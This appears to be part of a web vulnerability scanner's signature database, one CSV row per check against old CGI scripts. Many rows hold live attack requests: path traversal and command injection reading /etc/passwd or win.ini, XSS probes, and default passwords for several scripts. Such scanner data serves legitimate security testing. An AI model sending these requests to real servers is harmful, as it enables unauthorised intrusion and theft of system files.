c,generic,@CGIDIRS,enter.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,environ.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,environ.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,eshop.pl/seite=;cat%20eshop.pl|,"\/perl",GET,"This CGI allows attackers to execute commands on the remote server. CAN-2001-1014." c,generic,@CGIDIRS,ex-logger.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,excite,200,GET,"This might be interesting..." c,generic,@CGIDIRS,ezadmin.cgi,200,GET,"Some versions of this CGI are vulnerable to a buffer overflow." c,generic,@CGIDIRS,ezboard.cgi,200,GET,"Some versions of this CGI are vulnerable to a buffer overflow." c,generic,@CGIDIRS,ezman.cgi,200,GET,"Some versions of this CGI are vulnerable to a buffer overflow." c,generic,@CGIDIRS,ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|,200,GET,"EZShopper loadpage CGI read arbitrary files" c,generic,@CGIDIRS,ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1,200,GET,"EZShopper search CGI read arbitrary files" c,generic,@CGIDIRS,faqmanager.cgi?toc=/etc/passwd%00,"root:",GET,"FAQmanager allows arbitrary files to be read on the host. Upgrade to latest version: http://www.fourteenminutes.com/code/faqmanager/" c,generic,@CGIDIRS,faxsurvey?cat%20/etc/passwd,"root:",GET,"This CGI allows attackers to execute commands and read files remotely." c,generic,@CGIDIRS,filemail,200,GET,"This might be interesting..." c,generic,@CGIDIRS,filemail.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd,"root:",GET,"FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com" c,generic,@CGIDIRS,FileSeek.cgi?head=&foot=;cat%20/etc/passwd,"root:",GET,"FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com" c,generic,@CGIDIRS,FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=,"root:",GET,"FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com" c,generic,@CGIDIRS,FileSeek.cgi?head=;cat%20/etc/passwd|&foot=,"root:",GET,"FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com" c,generic,@CGIDIRS,FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd,"root:",GET,"FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com" c,generic,@CGIDIRS,FileSeek2.cgi?head=&foot=;cat%20/etc/passwd,"root:",GET,"FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com" c,generic,@CGIDIRS,FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=,"root:",GET,"FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com" c,generic,@CGIDIRS,FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=,"root:",GET,"FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com" c,generic,@CGIDIRS,finger,200,GET,"finger other users, may be other commands?" c,generic,@CGIDIRS,finger.cgi,200,GET,"finger other users, may be other commands?" c,generic,@CGIDIRS,finger.pl,200,GET,"finger other users, may be other commands?" c,generic,@CGIDIRS,flexform,200,GET,"Check Phrack 55 for info by RFP, allows to append info to writable files." c,generic,@CGIDIRS,flexform.cgi,200,GET,"Check Phrack 55 for info by RFP, allows to append info to writable files." c,generic,@CGIDIRS,fom.cgi?file=,"",GET,"Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. CA-2000-02." c,generic,@CGIDIRS,fom/fom.cgi?cmd=&file=1&keywords=vulnerable,"",GET,"Faq-O-Matic is vulnerable to cross site scripting (XSS) CA-2000-02. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html" c,generic,@CGIDIRS,formmail,"Version ",GET,"The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script." c,generic,@CGIDIRS,formmail.cgi,"Version ",GET,"The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script." c,generic,@CGIDIRS,formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test,"root:",GET,"This CGI allows attackers to retrieve arbitrary files from the server." c,generic,@CGIDIRS,formmail.pl,"Version ",GET,"The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script." c,generic,@CGIDIRS,formmail.pl,200,GET,"Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found." c,generic,@CGIDIRS,formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test,"root:",GET,"This CGI allows attackers to retrieve arbitrary files from the server." c,generic,@CGIDIRS,formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test,"root:",GET,"This CGI allows attackers to retrieve arbitrary files from the server." c,generic,@CGIDIRS,ftp.pl,200,GET,"This might be interesting... is file transfer allowed?" c,generic,@CGIDIRS,gbook/gbook.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1,"root:",GET,"This CGI from SIX webboard allows attackers read arbitrary files on the host." c,generic,@CGIDIRS,generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1,"[windows]",GET,"This CGI from SIX webboard allows attackers read arbitrary files on the host." c,generic,@CGIDIRS,generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1,"[fonts]",GET,"This CGI from SIX webboard allows attackers read arbitrary files on the host." c,generic,@CGIDIRS,get32.exe,200,GET,"This can allow attackers to execute arbitrary commands remotely." c,generic,@CGIDIRS,getdoc.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,gettransbitmap,200,GET,"Sun Answerbook2 is vulnerable to a buffer overflow in the gettransbitmap CGI. All default CGIs should be disabled or removed, and Answerbook2 should be disabled if not being used." c,generic,@CGIDIRS,gH.cgi,200,GET,"web backdoor by gH" c,generic,@CGIDIRS,glimpse,200,GET,"This might be interesting..." c,generic,@CGIDIRS,gm-authors.cgi,200,GET,"GreyMatter 'password' file, that controls who can post. This contains login and password information and is installed mode 666 by default. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info." c,generic,@CGIDIRS,gm-cplog.cgi,200,GET,"GreyMatter log file defaults to mode 666 and contains login and passwords used to update the GM site. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info." c,generic,@CGIDIRS,gm.cgi,200,GET,"GreyMatter blogger may reveal user ids/passwords through a gmrightclick-######.reg files (# are numbers), possibly in /archive or other archive location. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info." c,generic,@CGIDIRS,guestbook.cgi,200,GET,"May allow attackers to execute commands as the web daemon." c,generic,@CGIDIRS,guestbook.pl,200,GET,"May allow attackers to execute commands as the web daemon." c,generic,@CGIDIRS,handler.cgi,200,GET,"Variation of Irix Handler? Has been seen from other CGI scanners." c,generic,@CGIDIRS,hitview.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,hsx.cgi?show=../../../../../../../../../../../etc/passwd%00,"root:",GET,"This CGI contains a well known vul that allows attackers to read any system file." c,generic,@CGIDIRS,htgrep?file=index.html&hdr=/etc/passwd,"root:",GET,"This CGI contains a well known vul that allows attackers to read any system file." c,generic,@CGIDIRS,htimage.exe,200,GET,"This CGI can give an attacker a lot of information." c,generic,@CGIDIRS,htmlscript?../../../../../../../../../../etc/passwd,"root:",GET,"This CGI contains a well known vul that allows attackers to read any system file." c,generic,@CGIDIRS,htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E,"",GET,"htdig is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,htsearch?-c/nonexistant,"Unable to read configuration file '/nonexistant'",GET,"The ht::/Dig install may let an attacker force ht://Dig to read arbitrary config files for itself." c,generic,@CGIDIRS,htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=,"ht:\/\/Dig",GET,"The ht://Dig install may reveal the path to its configuration files, revealing sensitive information about the server." c,generic,@CGIDIRS,htsearch?exclude=%60/etc/passwd%60,"root:",GET,"This CGI contains a well known vul that allows attackers to read any system file." c,generic,@CGIDIRS,ibill.pm,200,GET,"iBill.pm is installed. This may allow brute forcing of passwords." c,generic,@CGIDIRS,icat,200,GET,"Multiple versions of icat allow attackers to read arbitrary files. Make sure the latest version is running." c,generic,@CGIDIRS,ikonboard/help.cgi?,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,imagemap,200,GET,"Possible variation: imagemap.exe installed could contain a buffer overflow. CVE-1999-0951. BID-739." c,generic,@CGIDIRS,imagemap.exe,200,GET,"The version of imagemap.exe installed could contain a buffer overflow. CVE-1999-0951. BID-739." c,generic,@CGIDIRS,inc/sendmail.inc,"This program is free software",GET,"Basilix allows its configuration files to be downloaded, which may include the mysql auth credentials." c,generic,@CGIDIRS,info2www,200,GET,"This CGI allows attackers to execute commands." c,generic,@CGIDIRS,infosrch.cgi,200,GET,"This CGI allows attackers to execute commands." c,generic,@CGIDIRS,jj,200,GET,"This might be interesting..." c,generic,@CGIDIRS,journal.cgi?folder=journal.cgi%00,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,ksh,200,GET,"Shell found in CGI dir!" c,generic,@CGIDIRS,lastlines.cgi?process,"root:","POST","This CGI lets attackers read arbitrary files and/or execte commands.","num_lines=1000&log_location=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" c,generic,@CGIDIRS,listrec.pl,200,GET,"This CGI allows attackers to execute commands on the host." c,generic,@CGIDIRS,loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to read arbitrary files on the host." c,generic,@CGIDIRS,loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini,"[windows]",GET,"This CGI allows attackers to read arbitrary files on the host." c,generic,@CGIDIRS,log-reader.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,log/,200,GET,"This might be interesting..." c,generic,@CGIDIRS,log/nether-log.pl?checkit,200,GET,"Default Pass: nethernet-rules" c,generic,@CGIDIRS,login.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,login.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,logit.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,logs.pl,200,GET,"May be interesting..." c,generic,@CGIDIRS,logs/,200,GET,"This might be interesting..." c,generic,@CGIDIRS,logs/access_log,200,GET,"Just found this log..." c,generic,@CGIDIRS,lookwho.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,LWGate,200,GET,"Check Phrack 55 for info by RFP" c,generic,@CGIDIRS,lwgate,200,GET,"Check Phrack 55 for info by RFP" c,generic,@CGIDIRS,LWGate.cgi,200,GET,"Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7" c,generic,@CGIDIRS,lwgate.cgi,200,GET,"Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7" c,generic,@CGIDIRS,mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00,"root:",GET,"EmuMail allows any file to be retrieved from the remote system." c,generic,@CGIDIRS,mailit.pl,200,GET,"Sambar may allow anonymous email to be sent from any host via this CGI." c,generic,@CGIDIRS,maillist.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,maillist.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,mailnews.cgi,200,GET,"some versions allow attacker to execute commands as http daemon. Upgrade or remove." c,generic,@CGIDIRS,main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to read arbitrary files remotely." c,generic,@CGIDIRS,majordomo.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,man.sh,200,GET,"This might be interesting..." c,generic,@CGIDIRS,meta.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,mgrqcgi,200,GET,"This CGI from Magic Enterprise 8.30-5 and earlier are vulnerable to multiple buffer overflows. Upgrade to 9.x." c,generic,@CGIDIRS,minimal.exe,200,GET,"This might be interesting..." c,generic,@CGIDIRS,mini_logger.cgi,200,GET,"Default password: guest" c,generic,@CGIDIRS,mkilog.exe,200,GET,"This CGI can give an attacker a lot of information." c,generic,@CGIDIRS,mkplog.exe,200,GET,"This CGI can give an attacker a lot of information." c,generic,@CGIDIRS,mmstdod.cgi,200,GET,"May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher." c,generic,@CGIDIRS,mrtg.cfg?cfg=../../../../../../../../etc/passwd,"root:",GET,"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version." c,generic,@CGIDIRS,mrtg.cgi?cfg=../../../../../../../../etc/passwd,"root:",GET,"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version." c,generic,@CGIDIRS,mrtg.cgi?cfg=blah,"Cannot find the given config file",GET,"Multi Router Traffic Grapher (mrtg.org) reveals system paths when an invalid config file is specified. Software should be upgraded to the latest version." c,generic,@CGIDIRS,multihtml.pl?multi=/etc/passwd%00html,"root:",GET,"This CGI allows attackers to read arbitrary files on the host." c,generic,@CGIDIRS,myguestbook.cgi?action=view,200,GET,"myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/. CA-2000-02." c,generic,@CGIDIRS,ncommerce3/ExecMacro/macro.d2w/%0a%0a,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to view arbitrary files on the server." c,generic,@CGIDIRS,netpad.cgi,200,GET,"netpad.cgi may be an indication of a malicious user on the system, as it allows web access to the file system. It may also have remote vulnerabilities itself. This should be removed or protected." c,generic,@CGIDIRS,newsdesk.cgi?t=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to view arbitrary files on the server." c,generic,@CGIDIRS,nlog-smb.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,nlog-smb.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00,"root:",GET,"EmuMail allows any file to be retrieved from the remote system." c,generic,@CGIDIRS,nph-maillist.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,nph-publish,200,GET,"This might be interesting..." c,generic,@CGIDIRS,nph-publish.cgi,200,GET,"This CGI may allow attackers to execute arbitrary commands on the server." c,generic,@CGIDIRS,nph-test-cgi,200,GET,"This CGI lets attackers get a directory listing of the CGI directory." c,generic,@CGIDIRS,ntitar.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,opendir.php?/etc/passwd,"root:",GET,"This CGI allows attackers to read any file on the web server." c,generic,@CGIDIRS,orders/orders.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." c,generic,@CGIDIRS,pagelog.cgi,200,GET,"Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try." c,generic,@CGIDIRS,pals-cgi?palsAction=restart&documentName=/etc/passwd,"root:",GET,"This CGI allows remote users to read system files." c,generic,@CGIDIRS,pass,200,GET,"This could be interesting..." c,generic,@CGIDIRS,passwd,200,GET,"This could be interesting..." c,generic,@CGIDIRS,passwd.txt,200,GET,"This could be interesting..." c,generic,@CGIDIRS,password,200,GET,"This could be interesting..." c,generic,@CGIDIRS,pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E,"",GET,"Lil'HTTP Server (Summit Computer Networks) CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,@CGIDIRS,Pbcgi.exe,200,GET,"Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers." c,generic,@CGIDIRS,perl,200,GET,"Shell/interpreter found" c,generic,@CGIDIRS,perl.exe,200,GET,"Can run PERL code" c,generic,@CGIDIRS,perl.exe?-v,200,GET,"perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir." c,generic,@CGIDIRS,perl?-v,200,GET,"perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl from the CGI dir." c,generic,@CGIDIRS,perlshop.cgi,200,GET,"v3.1 by ARPAnet.com; check info in Phrack 55 by RFP" c,generic,@CGIDIRS,pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|',"root:",GET,"This allows attackers to execute arbitrary commands on the host." c,generic,@CGIDIRS,pfdispaly.cgi?../../../../../../../../../../etc/passwd,"root:",GET,"This allows attackers to read arbitrary files on the host." c,generic,@CGIDIRS,pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|',"root:",GET,"This allows attackers to execute arbitrary commands on the host." c,generic,@CGIDIRS,phf,200,GET,"Old and vulnerable? Or is someone messing with us...?" c,generic,@CGIDIRS,phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd,"root:",GET,"C'mon, this is REALLY old... upgrade out for years" c,generic,@CGIDIRS,phf?Qname=root%0Acat%20/etc/passwd%20,"root:",GET,"This allows attackers to read arbitrary files on the system and perhaps execute commands." c,generic,@CGIDIRS,php-cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,php.cgi?/etc/passwd,"root:",GET,"This allows attackers to read arbitrary files on the system and perhaps execute commands." c,generic,@CGIDIRS,plusmail,200,GET,"This CGI may allow attackers to execute commands remotely." c,generic,@CGIDIRS,pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00,"root:",GET,"This CGI allows attackers to retrieve arbitrary files." c,generic,@CGIDIRS,pollssi.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,postcards.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,post_query,200,GET,"This might be interesting..." c,generic,@CGIDIRS,powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd,"root:",GET,"The Powerup CGI allows attackers to read any file on the system." c,generic,@CGIDIRS,ppdscgi.exe,200,GET,"PowerPlay Web Edition may allow unauthenticated users to view pages." c,generic,@CGIDIRS,processit.pl,200,GET,"This CGI returns environment variables, giving attackers valuable information." c,generic,@CGIDIRS,profile.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,pu3.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10,"root:",GET,"AHG's search.cgi allows any command to be executed. www.ahg.com." c,generic,@CGIDIRS,query?mss=%2e%2e/config,"MGMT_PW",GET,"The Altavista search service allows attackers to read any file on the server." c,generic,@CGIDIRS,quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=,"root:",GET,"This CGI allows attackers to read arbitrary files on the remote system." c,generic,@CGIDIRS,quizme.cgi,200,GET,"Mike's Quiz Me! CGI contained a bug which allowed arbitrary command exectution (version 0.5), see http://freshmeat.net/users/mikespice/" c,generic,@CGIDIRS,r.cgi?FILE=../../../../../../../../../../etc/passwd,"root:",GET,"The Powerup CGI allows attackers to read any file on the system." c,generic,@CGIDIRS,ratlog.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,redir.exe,200,GET,"This might be interesting..." c,generic,@CGIDIRS,replicator/webpage.cgi/,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,responder.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,retrieve_password.pl,200,GET,"May not be vulnerable, but see http://www.dcscripts.com/bugtrac/DCForumID7/3.html for information." c,generic,@CGIDIRS,rguest.exe,200,GET,"This might be interesting..." c,generic,@CGIDIRS,rksh,200,GET,"Shell found in CGI dir!" c,generic,@CGIDIRS,rmp_query,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,robadmin.cgi,200,GET,"Default password: roblog" c,generic,@CGIDIRS,robpoll.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,rpm_query,200,GET,"This CGI allows anyone to see the installed RPMs" c,generic,@CGIDIRS,rsh,200,GET,"Shell found" c,generic,@CGIDIRS,rtm.log,"HttpPost Retry",GET,"Rich Media's JustAddCommerce allows retrieval of a log file, which may contain sensitive information." c,generic,@CGIDIRS,rwcgi60,200,GET,"Oracle report server reveals system information without authorization. See See Oracle note 133957.1 - Restricting Access to the Reports Server Environment and Output" c,generic,@CGIDIRS,rwcgi60/showenv,200,GET,"Oracle report server reveals system information without authorization. See See Oracle note 133957.1 - Restricting Access to the Reports Server Environment and Output" c,generic,@CGIDIRS,rwwwshell.pl,200,GET,"THC reverse www shell" c,generic,@CGIDIRS,scoadminreg.cgi,200,GET,"This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web." c,generic,@CGIDIRS,search.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini,"[windows]",GET,"This CGI contains a well known vul that allows attackers to read any system file." c,generic,@CGIDIRS,search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini,"[fonts]",GET,"This CGI contains a well known vul that allows attackers to read any system file." c,generic,@CGIDIRS,search.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,search.pl?form=../../../../../../../../../../etc/passwd%00,"root:",GET,"The ROADS search.pl allows attackers to retrieve system files." c,generic,@CGIDIRS,search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=,"",GET,"Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Upgrade to FDSE version 2.0.0.0055" c,generic,@CGIDIRS,search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc,"resolv.conf",GET,"It is possible to read files on the remote server, this CGI should be removed." c,generic,@CGIDIRS,sendform.cgi,200,GET,"This CGI by Rod Clark (v1.4.4 and below) may allow arbitrary file reading via email or allow spam to be sent. CAN-2002-0710. BID-5286." c,generic,@CGIDIRS,sendpage.pl,200,GET,"Passes unparsed form input to command line" c,generic,@CGIDIRS,sendtemp.pl?templ=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI contains a well known vul that allows attackers to read any system file." c,generic,@CGIDIRS,session/adminlogin,200,GET,"This might be interesting..." c,generic,@CGIDIRS,sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd,"root:",GET,"Default scripts can allow arbitrary access to the host." c,generic,@CGIDIRS,sh,200,GET,"Shell found in CGI dir!" c,generic,@CGIDIRS,shop.cgi?page=../../../../../../../etc/passwd,"root:",GET,"Remote file read retrieval." c,generic,@CGIDIRS,shop/auth_data/auth_user_file.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." c,generic,@CGIDIRS,shop/orders/orders.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." c,generic,@CGIDIRS,shopper.cgi?newpage=../../../../../../../../../../etc/passwd,"root:",GET,"Versions 1 and 2 of Byte's Interactive Web Shoper allow attackers to read files remotely. Uncomment the #$debug=1 variable." c,generic,@CGIDIRS,shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|,"root:",GET,"ShopPlus Cart allows arbitrary command execution. CAN-2001-0992." c,generic,@CGIDIRS,show.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,simple/view_page?mv_arg=|cat%20/etc/passwd|,"root:",GET,"This CGI allows attackers to execute commands on the host as the HTTP daemon owner." c,generic,@CGIDIRS,sojourn.cgi?cat=../../../../../../../../../../etc/password%00,"root:",GET,"This CGI allows attackers to read arbitrary files." c,generic,@CGIDIRS,spin_client.cgi?aaaaaaaa,200,GET,"This CGI may be vulnerable to remote execution by sending 8000 x 'a' characters (check to see if you get a 500 error message)" c,generic,@CGIDIRS,ss,200,GET,"Mediahouse Statistics Server may allow attacker to execute remote commands. Upgrade to latest version or remove from the CGI directory." c,generic,@CGIDIRS,sscd_suncourier.pl,200,GET,"Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done." c,generic,@CGIDIRS,ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd,"root:",GET,"The server install allows reading of any system file by sending encoded '../' directives." c,generic,@CGIDIRS,stat/,200,GET,"This might be interesting..." c,generic,@CGIDIRS,stats-bin-p/reports/index.html,200,GET,"This might be interesting..." c,generic,@CGIDIRS,stats.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,stats.prf,200,GET,"This might be interesting..." c,generic,@CGIDIRS,stats/,200,GET,"This might be interesting..." c,generic,@CGIDIRS,statsconfig,200,GET,"This might be interesting..." c,generic,@CGIDIRS,stats_old/,200,GET,"This might be interesting..." c,generic,@CGIDIRS,statview.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html,"root:",GET,"This CGI allows attackers to read arbitrary files remotely." c,generic,@CGIDIRS,store/agora.cgi?cart_id=,"",GET,"Agora.cgi is vulnerable to Cross Site Scripting (XSS), CAN-2001-1199, CA-2000-02." c,generic,@CGIDIRS,store/agora.cgi?page=whatever33.html,"FILE:",GET,"Agora.cgi gives detailed error messages including file system paths." c,generic,@CGIDIRS,story.pl?next=../../../../../../../../../../etc/passwd%00,"root:",GET,"story.pl versions older than 1.4 allow any file to be read remotely." c,generic,@CGIDIRS,story/story.pl?next=../../../../../../../../../../etc/passwd%00,"root:",GET,"story.pl versions older than 1.4 allow any file to be read remotely." c,generic,@CGIDIRS,survey,200,GET,"This might be interesting..." c,generic,@CGIDIRS,survey.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,sws/admin.html,"manager.pl",GET,"Stepweb.com SWS search engine admin page is available. You may be able to change admin information without authentication." c,generic,@CGIDIRS,tablebuild.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1,200,GET,"Talkback CGI displays arbitrary files" c,generic,@CGIDIRS,tcsh,200,GET,"Shell found in CGI dir!" c,generic,@CGIDIRS,technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to read arbitrary files remotely." c,generic,@CGIDIRS,test-cgi?/*,"/tmp",GET,"This CGI allows files to read remotely." c,generic,@CGIDIRS,test.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,test/test.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,testcgi.exe,200,GET,"Sambar may be vulnerable to a DOS when a long string is passed to testcgi.exe (not attempted). Default CGI should be removed from web servers." c,generic,@CGIDIRS,texis.exe/junk,"Web Script",GET,"Texis Web Script gives system path/information when an invalid file is requested." c,generic,@CGIDIRS,texis/junk,"Web Script",GET,"Texis Web Script gives system path/information when an invalid file is requested." c,generic,@CGIDIRS,textcounter.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,tidfinder.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,tigvote.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,title.cgi,200,GET,"HNS's title.cgi is vulnerable to cross site scripting (XSS CA-2000-02). in version 2.00 and earlier, and Lite 0.8 and earlier." c,generic,@CGIDIRS,tpgnrock,200,GET,"This might be interesting..." c,generic,@CGIDIRS,traffic.cgi?cfg=../../../../../../../../etc/passwd,"root:",GET,"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version." c,generic,@CGIDIRS,troops.cgi,200,GET,"This CGI may be a leftover from a hacked site; may be used to attempt to hack other sites. It should be investigated further." c,generic,@CGIDIRS,ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd,"root:",GET,"Tarantell TTAWeb Top CGI lets remote users read arbitrary files." c,generic,@CGIDIRS,ultraboard.cgi,200,GET,"This might be interesting..." c,generic,@CGIDIRS,ultraboard.pl,200,GET,"This might be interesting..." c,generic,@CGIDIRS,unlg1.1,200,GET,"web backdoor by ULG" c,generic,@CGIDIRS,unlg1.2,200,GET,"web backdoor by ULG" c,generic,@CGIDIRS,update.dpgs,200,GET,"Duma Photo Gallery System may allow remote users to write to any file on the system. See http://b0iler.eyeonsecurity.net for details. This could not be remotely tested." c,generic,@CGIDIRS,upload.cgi,200,GET,"The upload.cgi allows attackers to upload arbitrary files to the server." c,generic,@CGIDIRS,Upload.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner." c,generic,@CGIDIRS,ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to read arbitrary files remotely. CAN-2001-0466." c,generic,@CGIDIRS,ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd,200,GET,"ustorekeeper will display arbitrary files. CAN-2001-0466" c,generic,@CGIDIRS,view-source,200,GET,"This may allow remote arbitrary file retrieval." 